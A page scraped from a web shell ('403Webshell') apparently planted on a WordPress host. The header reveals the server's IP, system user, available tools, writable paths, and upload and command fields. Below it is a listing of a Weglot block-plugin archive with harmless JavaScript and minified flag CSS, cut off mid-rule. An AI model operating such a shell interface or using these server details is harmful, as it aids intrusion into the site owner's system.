403Webshell
Server IP : 146.59.209.152  /  Your IP : 216.73.216.46
Web Server : Apache
System : Linux webm005.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User : infrafs ( 43850)
PHP Version : 8.2.29
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/i/n/f/infrafs/INFRABIKEIT/wp-content/plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/i/n/f/infrafs/INFRABIKEIT/wp-content/plugins/blocks.tar
weglot-menu/src/index.js000064400000001776151330373270011262 0ustar00/**
 * Registers a new block provided a unique name and an object defining its behavior.
 *
 * @see https://developer.wordpress.org/block-editor/reference-guides/block-api/block-registration/
 */
import { registerBlockType } from '@wordpress/blocks';

/**
 * Lets webpack process CSS, SASS or SCSS files referenced in JavaScript files.
 * All files containing `style` keyword are bundled together. The code used
 * gets applied both to the front of your site and to the editor.
 *
 * @see https://www.npmjs.com/package/@wordpress/scripts#using-css
 */
import icons from './icons.js'

/**
 * Internal dependencies
 */
import Edit from './edit';
import save from './save';

/**
 * Every block starts by registering a new block type definition.
 *
 * @see https://developer.wordpress.org/block-editor/reference-guides/block-api/block-registration/
 */
registerBlockType( 'create-block/weglot-menu', {
	icon: icons.weglot, // The Weglot icon
	/**
	 * @see ./edit.js
	 */
	edit: Edit,

	/**
	 * @see ./save.js
	 */
	save,
} );
weglot-menu/src/save.js000064400000001511151330373270011074 0ustar00/**
 * Retrieves the translation of text.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-i18n/
 */
import { __ } from '@wordpress/i18n';

/**
 * React hook that is used to mark the block wrapper element.
 * It provides all the necessary props like the class name.
 *
 * @see https://developer.wordpress.org/block-editor/packages/packages-block-editor/#useBlockProps
 */
import { useBlockProps } from '@wordpress/block-editor';

/**
 * The save function defines the way in which the different attributes should
 * be combined into the final markup, which is then serialized by the block
 * editor into `post_content`.
 *
 * @see https://developer.wordpress.org/block-editor/developers/block-api/block-edit-save/#save
 *
 * @return {WPElement} Element to render.
 */
export default function save() {
	return null;
}
weglot-menu/src/block.json000064400000000723151330373270011571 0ustar00{
  "$schema": "https://schemas.wp.org/trunk/block.json",
  "apiVersion": 2,
  "name": "create-block/weglot-menu",
  "version": "0.1.0",
  "title": "Weglot Widget menu",
  "category": "widgets",
  "parent": ["core/navigation"],
  "icon": "smiley",
  "description": "Weglot switcher menu",
  "supports": {
	"html": true
  },
  "textdomain": "weglot-menu",
  "editorScript": "file:./index.js",
  "editorStyle": "file:./index.css",
  "style": "file:./style-index.css"
}
weglot-menu/src/editor.scss000064400000150606151330373270011775 0ustar00/**
 * The following styles get applied inside the editor only.
 *
 * Replace them with your own styles or remove the file completely.
 */

.weglot-flags.hw>a:before,.weglot-flags.hw>span:before{background-position:-3570px 0 !important}.weglot-flags.af>a:before,.weglot-flags.af>span:before{background-position:-6570px 0 !important}.weglot-flags.fl>a:before,.weglot-flags.fl>span:before{background-position:-3060px 0 !important}.weglot-flags.sq>a:before,.weglot-flags.sq>span:before{background-position:-2580px 0 !important}.weglot-flags.am>a:before,.weglot-flags.am>span:before{background-position:-5130px 0 !important}.weglot-flags.ar>a:before,.weglot-flags.ar>span:before{background-position:-510px 0 !important}.weglot-flags.hy>a:before,.weglot-flags.hy>span:before{background-position:-1800px 0 !important}.weglot-flags.az>a:before,.weglot-flags.az>span:before{background-position:-6840px 0 !important}.weglot-flags.ba>a:before,.weglot-flags.ba>span:before{background-position:-2040px 0 !important}.weglot-flags.eu>a:before,.weglot-flags.eu>span:before{background-position:-7260px 0 !important}.weglot-flags.be>a:before,.weglot-flags.be>span:before{background-position:-5310px 0 !important}.weglot-flags.bn>a:before,.weglot-flags.bn>span:before{background-position:-5400px 0 !important}.weglot-flags.bs>a:before,.weglot-flags.bs>span:before{background-position:-6390px 0 !important}.weglot-flags.bg>a:before,.weglot-flags.bg>span:before{background-position:-2730px 0 !important}.weglot-flags.br>a:before,.weglot-flags.br>span:before{background-position:-6630px 0 !important}.weglot-flags.my>a:before,.weglot-flags.my>span:before{background-position:-3299px 0 !important}.weglot-flags.ca>a:before,.weglot-flags.ca>span:before{background-position:-7230px 0 !important}.weglot-flags.zh>a:before,.weglot-flags.zh>span:before{background-position:-3690px 0 !important}.weglot-flags.tw>a:before,.weglot-flags.tw>span:before{background-position:-2970px 0 !important}.weglot-flags.km>a:before,.weglot-flags.km>span:before{background-position:-6930px 0 !important}.weglot-flags.ny>a:before,.weglot-flags.ny>span:before{background-position:-1140px 0 !important}.weglot-flags.co>a:before,.weglot-flags.co>span:before{background-position:-2520px 0 !important}.weglot-flags.hr>a:before,.weglot-flags.hr>span:before{background-position:-5910px 0 !important}.weglot-flags.cs>a:before,.weglot-flags.cs>span:before{background-position:-2700px 0 !important}.weglot-flags.da>a:before,.weglot-flags.da>span:before{background-position:-2670px 0 !important}.weglot-flags.nl>a:before,.weglot-flags.nl>span:before{background-position:-2100px 0 !important}.weglot-flags.en>a:before,.weglot-flags.en>span:before{background-position:-1920px 0 !important}.weglot-flags.eo>a:before,.weglot-flags.eo>span:before{background-position:-1920px 0 !important}.weglot-flags.et>a:before,.weglot-flags.et>span:before{background-position:-2640px 0 !important}.weglot-flags.fj>a:before,.weglot-flags.fj>span:before{background-position:-1710px 0 !important}.weglot-flags.fi>a:before,.weglot-flags.fi>span:before{background-position:-2550px 0 !important}.weglot-flags.fr>a:before,.weglot-flags.fr>span:before{background-position:-2520px 0 !important}.weglot-flags.gl>a:before,.weglot-flags.gl>span:before{background-position:-7290px 0 !important}.weglot-flags.ka>a:before,.weglot-flags.ka>span:before{background-position:-5040px 0 !important}.weglot-flags.de>a:before,.weglot-flags.de>span:before{background-position:-2490px 0 !important}.weglot-flags.el>a:before,.weglot-flags.el>span:before{background-position:-2460px 0 !important}.weglot-flags.gu>a:before,.weglot-flags.gu>span:before{background-position:-1170px 0 !important}.weglot-flags.ht>a:before,.weglot-flags.ht>span:before{background-position:-4650px 0 !important}.weglot-flags.ha>a:before,.weglot-flags.ha>span:before{background-position:-900px 0 !important}.weglot-flags.he>a:before,.weglot-flags.he>span:before{background-position:-1050px 0 !important}.weglot-flags.hi>a:before,.weglot-flags.hi>span:before{background-position:-1170px 0 !important}.weglot-flags.hu>a:before,.weglot-flags.hu>span:before{background-position:-2430px 0 !important}.weglot-flags.is>a:before,.weglot-flags.is>span:before{background-position:-2400px 0 !important}.weglot-flags.ig>a:before,.weglot-flags.ig>span:before{background-position:-870px 0 !important}.weglot-flags.id>a:before,.weglot-flags.id>span:before{background-position:-3510px 0 !important}.weglot-flags.ga>a:before,.weglot-flags.ga>span:before{background-position:-2340px 0 !important}.weglot-flags.it>a:before,.weglot-flags.it>span:before{background-position:-2310px 0 !important}.weglot-flags.ja>a:before,.weglot-flags.ja>span:before{background-position:-3480px 0 !important}.weglot-flags.jv>a:before,.weglot-flags.jv>span:before{background-position:-3360px 0 !important}.weglot-flags.kn>a:before,.weglot-flags.kn>span:before{background-position:-1170px 0 !important}.weglot-flags.kk>a:before,.weglot-flags.kk>span:before{background-position:-3150px 0 !important}.weglot-flags.ko>a:before,.weglot-flags.ko>span:before{background-position:-6990px 0 !important}.weglot-flags.ku>a:before,.weglot-flags.ku>span:before{background-position:-2430px 0 !important}.weglot-flags.ky>a:before,.weglot-flags.ky>span:before{background-position:-3420px 0 !important}.weglot-flags.lo>a:before,.weglot-flags.lo>span:before{background-position:-3450px 0 !important}.weglot-flags.la>a:before,.weglot-flags.la>span:before{background-position:-2310px 0 !important}.weglot-flags.lv>a:before,.weglot-flags.lv>span:before{background-position:-2280px 0 !important}.weglot-flags.lt>a:before,.weglot-flags.lt>span:before{background-position:-2250px 0 !important}.weglot-flags.lb>a:before,.weglot-flags.lb>span:before{background-position:-2220px 0 !important}.weglot-flags.mk>a:before,.weglot-flags.mk>span:before{background-position:-2190px 0 !important}.weglot-flags.mg>a:before,.weglot-flags.mg>span:before{background-position:-1200px 0 !important}.weglot-flags.ms>a:before,.weglot-flags.ms>span:before{background-position:-3360px 0 !important}.weglot-flags.ml>a:before,.weglot-flags.ml>span:before{background-position:-1170px 0 !important}.weglot-flags.mt>a:before,.weglot-flags.mt>span:before{background-position:-2130px 0 !important}.weglot-flags.mi>a:before,.weglot-flags.mi>span:before{background-position:-3240px 0 !important}.weglot-flags.mr>a:before,.weglot-flags.mr>span:before{background-position:-1170px 0 !important}.weglot-flags.mn>a:before,.weglot-flags.mn>span:before{background-position:-6000px 0 !important}.weglot-flags.ne>a:before,.weglot-flags.ne>span:before{background-position:-3270px 0 !important}.weglot-flags.no>a:before,.weglot-flags.no>span:before{background-position:-5850px 0 !important}.weglot-flags.ps>a:before,.weglot-flags.ps>span:before{background-position:-5189px 0 !important}.weglot-flags.fa>a:before,.weglot-flags.fa>span:before{background-position:-6690px 0 !important}.weglot-flags.pl>a:before,.weglot-flags.pl>span:before{background-position:-2160px 0 !important}.weglot-flags.pt>a:before,.weglot-flags.pt>span:before{background-position:-1740px 0 !important}.weglot-flags.pa>a:before,.weglot-flags.pa>span:before{background-position:-3180px 0 !important}.weglot-flags.ro>a:before,.weglot-flags.ro>span:before{background-position:-2070px 0 !important}.weglot-flags.ru>a:before,.weglot-flags.ru>span:before{background-position:-2040px 0 !important}.weglot-flags.sm>a:before,.weglot-flags.sm>span:before{background-position:-4620px 0 !important}.weglot-flags.gd>a:before,.weglot-flags.gd>span:before{background-position:-30px 0 !important}.weglot-flags.sr>a:before,.weglot-flags.sr>span:before{background-position:-4290px 0 !important}.weglot-flags.sn>a:before,.weglot-flags.sn>span:before{background-position:-540px 0 !important}.weglot-flags.sd>a:before,.weglot-flags.sd>span:before{background-position:-3180px 0 !important}.weglot-flags.si>a:before,.weglot-flags.si>span:before{background-position:-2820px 0 !important}.weglot-flags.sk>a:before,.weglot-flags.sk>span:before{background-position:-6810px 0 !important}.weglot-flags.sl>a:before,.weglot-flags.sl>span:before{background-position:-2010px 0 !important}.weglot-flags.so>a:before,.weglot-flags.so>span:before{background-position:-4560px 0 !important}.weglot-flags.st>a:before,.weglot-flags.st>span:before{background-position:-4830px 0 !important}.weglot-flags.es>a:before,.weglot-flags.es>span:before{background-position:-480px 0 !important}.weglot-flags.su>a:before,.weglot-flags.su>span:before{background-position:-4530px 0 !important}.weglot-flags.sw>a:before,.weglot-flags.sw>span:before{background-position:-1290px 0 !important}.weglot-flags.sv>a:before,.weglot-flags.sv>span:before{background-position:-1980px 0 !important}.weglot-flags.tl>a:before,.weglot-flags.tl>span:before{background-position:-3060px 0 !important}.weglot-flags.ty>a:before,.weglot-flags.ty>span:before{background-position:-6270px 0 !important}.weglot-flags.tg>a:before,.weglot-flags.tg>span:before{background-position:-2940px 0 !important}.weglot-flags.ta>a:before,.weglot-flags.ta>span:before{background-position:-1170px 0 !important}.weglot-flags.tt>a:before,.weglot-flags.tt>span:before{background-position:-2040px 0 !important}.weglot-flags.te>a:before,.weglot-flags.te>span:before{background-position:-1170px 0 !important}.weglot-flags.th>a:before,.weglot-flags.th>span:before{background-position:-2910px 0 !important}.weglot-flags.to>a:before,.weglot-flags.to>span:before{background-position:-6540px 0 !important}.weglot-flags.tr>a:before,.weglot-flags.tr>span:before{background-position:-1950px 0 !important}.weglot-flags.uk>a:before,.weglot-flags.uk>span:before{background-position:-1890px 0 !important}.weglot-flags.ur>a:before,.weglot-flags.ur>span:before{background-position:-3180px 0 !important}.weglot-flags.uz>a:before,.weglot-flags.uz>span:before{background-position:-2880px 0 !important}.weglot-flags.vi>a:before,.weglot-flags.vi>span:before{background-position:-2850px 0 !important}.weglot-flags.cy>a:before,.weglot-flags.cy>span:before{background-position:-6420px 0 !important}.weglot-flags.fy>a:before,.weglot-flags.fy>span:before{background-position:-2100px 0 !important}.weglot-flags.xh>a:before,.weglot-flags.xh>span:before{background-position:-6570px 0 !important}.weglot-flags.yi>a:before,.weglot-flags.yi>span:before{background-position:-1050px 0 !important}.weglot-flags.yo>a:before,.weglot-flags.yo>span:before{background-position:-870px 0 !important}.weglot-flags.zu>a:before,.weglot-flags.zu>span:before{background-position:-6570px 0 !important}.weglot-flags.flag-1.hw>a:before,.weglot-flags.flag-1.hw>span:before{background-position:-7840px 0 !important}.weglot-flags.flag-1.fl>a:before,.weglot-flags.flag-1.fl>span:before{background-position:2560px 0 !important}.weglot-flags.flag-1.af>a:before,.weglot-flags.flag-1.af>span:before{background-position:-6848px 0 !important}.weglot-flags.flag-1.sq>a:before,.weglot-flags.flag-1.sq>span:before{background-position:-97px 0 !important}.weglot-flags.flag-1.am>a:before,.weglot-flags.flag-1.am>span:before{background-position:-2369px 0 !important}.weglot-flags.flag-1.ar>a:before,.weglot-flags.flag-1.ar>span:before{background-position:-6465px 0 !important}.weglot-flags.flag-1.hy>a:before,.weglot-flags.flag-1.hy>span:before{background-position:-385px 0 !important}.weglot-flags.flag-1.az>a:before,.weglot-flags.flag-1.az>span:before{background-position:-513px 0 !important}.weglot-flags.flag-1.ba>a:before,.weglot-flags.flag-1.ba>span:before{background-position:-6113px 0 !important}.weglot-flags.flag-1.eu>a:before,.weglot-flags.flag-1.eu>span:before{background-position:-8353px 0 !important}.weglot-flags.flag-1.be>a:before,.weglot-flags.flag-1.be>span:before{background-position:-705px 0 !important}.weglot-flags.flag-1.bn>a:before,.weglot-flags.flag-1.bn>span:before{background-position:-609px 0 !important}.weglot-flags.flag-1.bs>a:before,.weglot-flags.flag-1.bs>span:before{background-position:-929px 0 !important}.weglot-flags.flag-1.bg>a:before,.weglot-flags.flag-1.bg>span:before{background-position:-1121px 0 !important}.weglot-flags.flag-1.br>a:before,.weglot-flags.flag-1.br>span:before{background-position:-993px 0 !important}.weglot-flags.flag-1.my>a:before,.weglot-flags.flag-1.my>span:before{background-position:-4929px 0 !important}.weglot-flags.flag-1.ca>a:before,.weglot-flags.flag-1.ca>span:before{background-position:-8321px 0 !important}.weglot-flags.flag-1.zh>a:before,.weglot-flags.flag-1.zh>span:before{background-position:-1505px 0 !important}.weglot-flags.flag-1.tw>a:before,.weglot-flags.flag-1.tw>span:before{background-position:-6369px 0 !important}.weglot-flags.flag-1.km>a:before,.weglot-flags.flag-1.km>span:before{background-position:-1217px 0 !important}.weglot-flags.flag-1.ny>a:before,.weglot-flags.flag-1.ny>span:before{background-position:-4289px 0 !important}.weglot-flags.flag-1.co>a:before,.weglot-flags.flag-1.co>span:before{background-position:-2561px 0 !important}.weglot-flags.flag-1.hr>a:before,.weglot-flags.flag-1.hr>span:before{background-position:-1793px 0 !important}.weglot-flags.flag-1.cs>a:before,.weglot-flags.flag-1.cs>span:before{background-position:-1921px 0 !important}.weglot-flags.flag-1.da>a:before,.weglot-flags.flag-1.da>span:before{background-position:-1985px 0 !important}.weglot-flags.flag-1.nl>a:before,.weglot-flags.flag-1.nl>span:before{background-position:-5121px 0 !important}.weglot-flags.flag-1.en>a:before,.weglot-flags.flag-1.en>span:before{background-position:-7777px 0 !important}.weglot-flags.flag-1.eo>a:before,.weglot-flags.flag-1.eo>span:before{background-position:-7777px 0 !important}.weglot-flags.flag-1.et>a:before,.weglot-flags.flag-1.et>span:before{background-position:-2337px 0 !important}.weglot-flags.flag-1.fj>a:before,.weglot-flags.flag-1.fj>span:before{background-position:-2497px 0 !important}.weglot-flags.flag-1.fi>a:before,.weglot-flags.flag-1.fi>span:before{background-position:-2529px 0 !important}.weglot-flags.flag-1.fr>a:before,.weglot-flags.flag-1.fr>span:before{background-position:-2561px 0 !important}.weglot-flags.flag-1.gl>a:before,.weglot-flags.flag-1.gl>span:before{background-position:-8383px 0 !important}.weglot-flags.flag-1.ka>a:before,.weglot-flags.flag-1.ka>span:before{background-position:-2721px 0 !important}.weglot-flags.flag-1.de>a:before,.weglot-flags.flag-1.de>span:before{background-position:-2753px 0 !important}.weglot-flags.flag-1.el>a:before,.weglot-flags.flag-1.el>span:before{background-position:-2881px 0 !important}.weglot-flags.flag-1.gu>a:before,.weglot-flags.flag-1.gu>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.ht>a:before,.weglot-flags.flag-1.ht>span:before{background-position:-3169px 0 !important}.weglot-flags.flag-1.ha>a:before,.weglot-flags.flag-1.ha>span:before{background-position:-5281px 0 !important}.weglot-flags.flag-1.he>a:before,.weglot-flags.flag-1.he>span:before{background-position:-3521px 0 !important}.weglot-flags.flag-1.hi>a:before,.weglot-flags.flag-1.hi>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.hu>a:before,.weglot-flags.flag-1.hu>span:before{background-position:-3265px 0 !important}.weglot-flags.flag-1.is>a:before,.weglot-flags.flag-1.is>span:before{background-position:-3297px 0 !important}.weglot-flags.flag-1.ig>a:before,.weglot-flags.flag-1.ig>span:before{background-position:-5313px 0 !important}.weglot-flags.flag-1.id>a:before,.weglot-flags.flag-1.id>span:before{background-position:-3361px 0 !important}.weglot-flags.flag-1.ga>a:before,.weglot-flags.flag-1.ga>span:before{background-position:-3457px 0 !important}.weglot-flags.flag-1.it>a:before,.weglot-flags.flag-1.it>span:before{background-position:-3553px 0 !important}.weglot-flags.flag-1.ja>a:before,.weglot-flags.flag-1.ja>span:before{background-position:-3617px 0 !important}.weglot-flags.flag-1.jv>a:before,.weglot-flags.flag-1.jv>span:before{background-position:-4321px 0 !important}.weglot-flags.flag-1.kn>a:before,.weglot-flags.flag-1.kn>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.kk>a:before,.weglot-flags.flag-1.kk>span:before{background-position:-3713px 0 !important}.weglot-flags.flag-1.ko>a:before,.weglot-flags.flag-1.ko>span:before{background-position:-6913px 0 !important}.weglot-flags.flag-1.ku>a:before,.weglot-flags.flag-1.ku>span:before{background-position:-3265px 0 !important}.weglot-flags.flag-1.ky>a:before,.weglot-flags.flag-1.ky>span:before{background-position:-3873px 0 !important}.weglot-flags.flag-1.lo>a:before,.weglot-flags.flag-1.lo>span:before{background-position:-3904px 0 !important}.weglot-flags.flag-1.la>a:before,.weglot-flags.flag-1.la>span:before{background-position:-3553px 0 !important}.weglot-flags.flag-1.lv>a:before,.weglot-flags.flag-1.lv>span:before{background-position:-3937px 0 !important}.weglot-flags.flag-1.lt>a:before,.weglot-flags.flag-1.lt>span:before{background-position:-4129px 0 !important}.weglot-flags.flag-1.lb>a:before,.weglot-flags.flag-1.lb>span:before{background-position:-4161px 0 !important}.weglot-flags.flag-1.mk>a:before,.weglot-flags.flag-1.mk>span:before{background-position:-4225px 0 !important}.weglot-flags.flag-1.mg>a:before,.weglot-flags.flag-1.mg>span:before{background-position:-4257px 0 !important}.weglot-flags.flag-1.ms>a:before,.weglot-flags.flag-1.ms>span:before{background-position:-4321px 0 !important}.weglot-flags.flag-1.ml>a:before,.weglot-flags.flag-1.ml>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.mt>a:before,.weglot-flags.flag-1.mt>span:before{background-position:-4417px 0 !important}.weglot-flags.flag-1.mi>a:before,.weglot-flags.flag-1.mi>span:before{background-position:-5217px 0 !important}.weglot-flags.flag-1.mr>a:before,.weglot-flags.flag-1.mr>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.mn>a:before,.weglot-flags.flag-1.mn>span:before{background-position:-4769px 0 !important}.weglot-flags.flag-1.ne>a:before,.weglot-flags.flag-1.ne>span:before{background-position:-5091px 0 !important}.weglot-flags.flag-1.no>a:before,.weglot-flags.flag-1.no>span:before{background-position:-5505px 0 !important}.weglot-flags.flag-1.ps>a:before,.weglot-flags.flag-1.ps>span:before{background-position:-33px 0 !important}.weglot-flags.flag-1.fa>a:before,.weglot-flags.flag-1.fa>span:before{background-position:-3393px 0 !important}.weglot-flags.flag-1.pl>a:before,.weglot-flags.flag-1.pl>span:before{background-position:-5889px 0 !important}.weglot-flags.flag-1.pt>a:before,.weglot-flags.flag-1.pt>span:before{background-position:-5921px 0 !important}.weglot-flags.flag-1.pa>a:before,.weglot-flags.flag-1.pa>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.ro>a:before,.weglot-flags.flag-1.ro>span:before{background-position:-6081px 0 !important}.weglot-flags.flag-1.ru>a:before,.weglot-flags.flag-1.ru>span:before{background-position:-6113px 0 !important}.weglot-flags.flag-1.sm>a:before,.weglot-flags.flag-1.sm>span:before{background-position:-6369px 0 !important}.weglot-flags.flag-1.gd>a:before,.weglot-flags.flag-1.gd>span:before{background-position:-6497px 0 !important}.weglot-flags.flag-1.sr>a:before,.weglot-flags.flag-1.sr>span:before{background-position:-6561px 0 !important}.weglot-flags.flag-1.sn>a:before,.weglot-flags.flag-1.sn>span:before{background-position:-8287px 0 !important}.weglot-flags.flag-1.sd>a:before,.weglot-flags.flag-1.sd>span:before{background-position:-5601px 0 !important}.weglot-flags.flag-1.si>a:before,.weglot-flags.flag-1.si>span:before{background-position:-7039px 0 !important}.weglot-flags.flag-1.sk>a:before,.weglot-flags.flag-1.sk>span:before{background-position:-6689px 0 !important}.weglot-flags.flag-1.sl>a:before,.weglot-flags.flag-1.sl>span:before{background-position:-6721px 0 !important}.weglot-flags.flag-1.so>a:before,.weglot-flags.flag-1.so>span:before{background-position:-6785px 0 !important}.weglot-flags.flag-1.st>a:before,.weglot-flags.flag-1.st>span:before{background-position:-4001px 0 !important}.weglot-flags.flag-1.es>a:before,.weglot-flags.flag-1.es>span:before{background-position:-7009px 0 !important}.weglot-flags.flag-1.su>a:before,.weglot-flags.flag-1.su>span:before{background-position:-7073px 0 !important}.weglot-flags.flag-1.sw>a:before,.weglot-flags.flag-1.sw>span:before{background-position:-3745px 0 !important}.weglot-flags.flag-1.sv>a:before,.weglot-flags.flag-1.sv>span:before{background-position:-7169px 0 !important}.weglot-flags.flag-1.tl>a:before,.weglot-flags.flag-1.tl>span:before{background-position:-5823px 0 !important}.weglot-flags.flag-1.ty>a:before,.weglot-flags.flag-1.ty>span:before{background-position:-2593px 0 !important}.weglot-flags.flag-1.tg>a:before,.weglot-flags.flag-1.tg>span:before{background-position:-7297px 0 !important}.weglot-flags.flag-1.ta>a:before,.weglot-flags.flag-1.ta>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.tt>a:before,.weglot-flags.flag-1.tt>span:before{background-position:-6113px 0 !important}.weglot-flags.flag-1.te>a:before,.weglot-flags.flag-1.te>span:before{background-position:-3329px 0 !important}.weglot-flags.flag-1.th>a:before,.weglot-flags.flag-1.th>span:before{background-position:-7361px 0 !important}.weglot-flags.flag-1.to>a:before,.weglot-flags.flag-1.to>span:before{background-position:-7456px 0 !important}.weglot-flags.flag-1.tr>a:before,.weglot-flags.flag-1.tr>span:before{background-position:-7553px 0 !important}.weglot-flags.flag-1.uk>a:before,.weglot-flags.flag-1.uk>span:before{background-position:-7713px 0 !important}.weglot-flags.flag-1.ur>a:before,.weglot-flags.flag-1.ur>span:before{background-position:-5600px 0 !important}.weglot-flags.flag-1.uz>a:before,.weglot-flags.flag-1.uz>span:before{background-position:-7969px 0 !important}.weglot-flags.flag-1.vi>a:before,.weglot-flags.flag-1.vi>span:before{background-position:-8097px 0 !important}.weglot-flags.flag-1.cy>a:before,.weglot-flags.flag-1.cy>span:before{background-position:-8129px 0 !important}.weglot-flags.flag-1.fy>a:before,.weglot-flags.flag-1.fy>span:before{background-position:-5121px 0 !important}.weglot-flags.flag-1.xh>a:before,.weglot-flags.flag-1.xh>span:before{background-position:-6848px 0 !important}.weglot-flags.flag-1.yi>a:before,.weglot-flags.flag-1.yi>span:before{background-position:-3521px 0 !important}.weglot-flags.flag-1.yo>a:before,.weglot-flags.flag-1.yo>span:before{background-position:-5313px 0 !important}.weglot-flags.flag-1.zu>a:before,.weglot-flags.flag-1.zu>span:before{background-position:-6848px 0 !important}.weglot-flags.flag-2.hw>a:before,.weglot-flags.flag-2.hw>span:before{background-position:-5448px 0 !important}.weglot-flags.flag-2.fl>a:before,.weglot-flags.flag-2.fl>span:before{background-position:-1008px 0 !important}.weglot-flags.flag-2.af>a:before,.weglot-flags.flag-2.af>span:before{background-position:-4968px 0 !important}.weglot-flags.flag-2.sq>a:before,.weglot-flags.flag-2.sq>span:before{background-position:-2976px 0 !important}.weglot-flags.flag-2.am>a:before,.weglot-flags.flag-2.am>span:before{background-position:-3816px 0 !important}.weglot-flags.flag-2.ar>a:before,.weglot-flags.flag-2.ar>span:before{background-position:-768px 0 !important}.weglot-flags.flag-2.hy>a:before,.weglot-flags.flag-2.hy>span:before{background-position:0 0 !important}.weglot-flags.flag-2.az>a:before,.weglot-flags.flag-2.az>span:before{background-position:-5136px 0 !important}.weglot-flags.flag-2.ba>a:before,.weglot-flags.flag-2.ba>span:before{background-position:-936px 0 !important}.weglot-flags.flag-2.eu>a:before,.weglot-flags.flag-2.eu>span:before{background-position:-5376px 0 !important}.weglot-flags.flag-2.be>a:before,.weglot-flags.flag-2.be>span:before{background-position:-4224px 0 !important}.weglot-flags.flag-2.bn>a:before,.weglot-flags.flag-2.bn>span:before{background-position:-4056px 0 !important}.weglot-flags.flag-2.bs>a:before,.weglot-flags.flag-2.bs>span:before{background-position:-3984px 0 !important}.weglot-flags.flag-2.bg>a:before,.weglot-flags.flag-2.bg>span:before{background-position:-5040px 0 !important}.weglot-flags.flag-2.br>a:before,.weglot-flags.flag-2.br>span:before{background-position:-2784px 0 !important}.weglot-flags.flag-2.my>a:before,.weglot-flags.flag-2.my>span:before{background-position:-1248px 0 !important}.weglot-flags.flag-2.ca>a:before,.weglot-flags.flag-2.ca>span:before{background-position:-5352px 0 !important}.weglot-flags.flag-2.zh>a:before,.weglot-flags.flag-2.zh>span:before{background-position:-2592px 0 !important}.weglot-flags.flag-2.tw>a:before,.weglot-flags.flag-2.tw>span:before{background-position:-3408px 0 !important}.weglot-flags.flag-2.km>a:before,.weglot-flags.flag-2.km>span:before{background-position:-5160px 0 !important}.weglot-flags.flag-2.ny>a:before,.weglot-flags.flag-2.ny>span:before{background-position:-1392px 0 !important}.weglot-flags.flag-2.co>a:before,.weglot-flags.flag-2.co>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-2.hr>a:before,.weglot-flags.flag-2.hr>span:before{background-position:-4416px 0 !important}.weglot-flags.flag-2.cs>a:before,.weglot-flags.flag-2.cs>span:before{background-position:-2472px 0 !important}.weglot-flags.flag-2.da>a:before,.weglot-flags.flag-2.da>span:before{background-position:-2448px 0 !important}.weglot-flags.flag-2.nl>a:before,.weglot-flags.flag-2.nl>span:before{background-position:-1296px 0 !important}.weglot-flags.flag-2.en>a:before,.weglot-flags.flag-2.en>span:before{background-position:-312px 0 !important}.weglot-flags.flag-2.eo>a:before,.weglot-flags.flag-2.eo>span:before{background-position:-312px 0 !important}.weglot-flags.flag-2.et>a:before,.weglot-flags.flag-2.et>span:before{background-position:-2424px 0 !important}.weglot-flags.flag-2.fj>a:before,.weglot-flags.flag-2.fj>span:before{background-position:-576px 0 !important}.weglot-flags.flag-2.fi>a:before,.weglot-flags.flag-2.fi>span:before{background-position:-2328px 0 !important}.weglot-flags.flag-2.fr>a:before,.weglot-flags.flag-2.fr>span:before{background-position:-2304px 0 !important}.weglot-flags.flag-2.gl>a:before,.weglot-flags.flag-2.gl>span:before{background-position:-5400px 0 !important}.weglot-flags.flag-2.ka>a:before,.weglot-flags.flag-2.ka>span:before{background-position:-3744px 0 !important}.weglot-flags.flag-2.de>a:before,.weglot-flags.flag-2.de>span:before{background-position:-2256px 0 !important}.weglot-flags.flag-2.el>a:before,.weglot-flags.flag-2.el>span:before{background-position:-2208px 0 !important}.weglot-flags.flag-2.gu>a:before,.weglot-flags.flag-2.gu>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.ht>a:before,.weglot-flags.flag-2.ht>span:before{background-position:-3528px 0 !important}.weglot-flags.flag-2.ha>a:before,.weglot-flags.flag-2.ha>span:before{background-position:-1176px 0 !important}.weglot-flags.flag-2.he>a:before,.weglot-flags.flag-2.he>span:before{background-position:-1992px 0 !important}.weglot-flags.flag-2.hi>a:before,.weglot-flags.flag-2.hi>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.hu>a:before,.weglot-flags.flag-2.hu>span:before{background-position:-2088px 0 !important}.weglot-flags.flag-2.is>a:before,.weglot-flags.flag-2.is>span:before{background-position:-2064px 0 !important}.weglot-flags.flag-2.ig>a:before,.weglot-flags.flag-2.ig>span:before{background-position:-1103px 0 !important}.weglot-flags.flag-2.id>a:before,.weglot-flags.flag-2.id>span:before{background-position:-2040px 0 !important}.weglot-flags.flag-2.ga>a:before,.weglot-flags.flag-2.ga>span:before{background-position:-2016px 0 !important}.weglot-flags.flag-2.it>a:before,.weglot-flags.flag-2.it>span:before{background-position:-1968px 0 !important}.weglot-flags.flag-2.ja>a:before,.weglot-flags.flag-2.ja>span:before{background-position:-1920px 0 !important}.weglot-flags.flag-2.jv>a:before,.weglot-flags.flag-2.jv>span:before{background-position:-1536px 0 !important}.weglot-flags.flag-2.kn>a:before,.weglot-flags.flag-2.kn>span:before{background-position:-1728px 0 !important}.weglot-flags.flag-2.kk>a:before,.weglot-flags.flag-2.kk>span:before{background-position:-1704px 0 !important}.weglot-flags.flag-2.ko>a:before,.weglot-flags.flag-2.ko>span:before{background-position:-1848px 0 !important}.weglot-flags.flag-2.ku>a:before,.weglot-flags.flag-2.ku>span:before{background-position:-2088px 0 !important}.weglot-flags.flag-2.ky>a:before,.weglot-flags.flag-2.ky>span:before{background-position:-1800px 0 !important}.weglot-flags.flag-2.lo>a:before,.weglot-flags.flag-2.lo>span:before{background-position:-1776px 0 